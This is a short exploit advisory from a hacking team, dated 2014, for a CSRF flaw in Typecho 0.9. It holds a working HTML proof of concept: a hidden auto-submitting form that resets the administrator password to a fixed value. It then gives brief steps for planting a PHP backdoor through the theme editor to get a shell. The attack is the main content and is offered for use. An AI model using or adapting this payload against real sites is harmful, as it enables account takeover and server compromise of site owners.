Typecho 0.9 (13.12.12) CSRF administrator password Modification Vulnerability
We enjoy hacking of life in day and night. ___________________________________________________ [+] HSID: FF000-HSDB-0002 [+] Author: Evi1m0 <evi1m0.bat@gmail.com> [+] Team: FF0000 TEAM < http://www.ff0000.cc > [+] From: HackerSoul < http://www.hackersoul.com > [+] Create: 2014-06-22 _______________________________________________-= Main =-[*] 1. Description http://typecho/admin/profile.php Page, Change password form CSRF vul. http://typecho/admin/themes.php , We can write the PHP Backdoor in this page. [*] 2. CSRF POC
<div style="display: none;"><form action="http://typecho/index.php/action/users-profile" method="post" name="ff0000team" enctype="application/x-www-form-urlencoded"><input type="hidden" name="password" value="bug1024"/><input type="hidden" name="confirm" value="bug1024" /><input name="do" type="hidden" value="password" /><button type="submit"></button></form></div><script>setTimeout("document.ff0000team.submit()", 2000);</script>
[*] 3. GETSHELL http: // typecho/admin/theme-editor.php page, Write backdoor. Or, Write this: http://www.hackersoul.com/post/php use the location-based reverse button to create a portal. html-= END =-